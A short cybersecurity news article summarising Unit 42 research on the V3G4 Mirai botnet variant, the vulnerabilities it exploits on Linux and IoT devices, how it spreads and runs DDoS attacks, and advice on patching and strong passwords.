A newly discovered variant of the infamous Mirai botnet has emerged, exploiting multiple security vulnerabilities to spread across Linux and Internet of Things (IoT) devices. Identified in the latter half of 2022, this variant has been labeled V3G4 by researchers at Palo Alto Networks’ Unit 42. Their investigation has revealed that three separate campaigns are likely orchestrated by the same cybercriminal group.
Unit 42 researchers noted that once attackers gain control of these vulnerable devices, they fully integrate them into the botnet. This allows the threat actor to leverage the compromised devices for a range of malicious activities, particularly distributed denial-of-service (DDoS) attacks. The focus of these attacks is on unsecured Linux servers and networking equipment, with attackers exploiting up to thirteen vulnerabilities capable of facilitating remote code execution (RCE).
Among the critical vulnerabilities exploited are those affecting widely used platforms and devices, including Atlassian Confluence Server, DrayTek Vigor routers, Airspan AirSpot, and Geutebruck IP cameras. Notably, the oldest vulnerability associated with this threat is CVE-2012-4869, an RCE flaw in FreePBX, underlining the ongoing risk posed by outdated security measures.
Upon successfully breaching a target, V3G4 retrieves its payload from a remote location utilizing standard command-line tools such as wget and cURL. Furthermore, the botnet is designed to check for existing instances on the infected machine, targeting competing botnets like Mozi, Okami, and Yakuza for termination, thereby consolidating control over the network.
This variant comes equipped with a collection of default or weak credentials, enabling it to conduct brute-force attacks via Telnet and SSH to infiltrate additional systems. In doing so, V3G4 establishes a connection to a command-and-control (C2) server to await instructions for executing DDoS operations using various protocols, including UDP, TCP, and HTTP.
Researchers emphasize that the vulnerabilities exploited by this botnet present lower attack complexities than those observed in earlier variants. However, they retain a critical potential for enabling remote code execution. To mitigate the risk from such threats, it is vital for users to apply available patches and updates promptly, while also implementing strong password policies to secure their devices.
In summary, the emergence of the V3G4 variant of the Mirai botnet signifies a continued evolution in the tactics employed by cybercriminal groups. Business owners must remain vigilant, continually reinforcing their cybersecurity measures to defend against these evolving threats. Utilizing frameworks like MITRE ATT&CK, which categorizes tactics such as initial access, persistence, and privilege escalation, can provide valuable insights into the operational strategies of adversaries in this ever-changing landscape of cybersecurity.
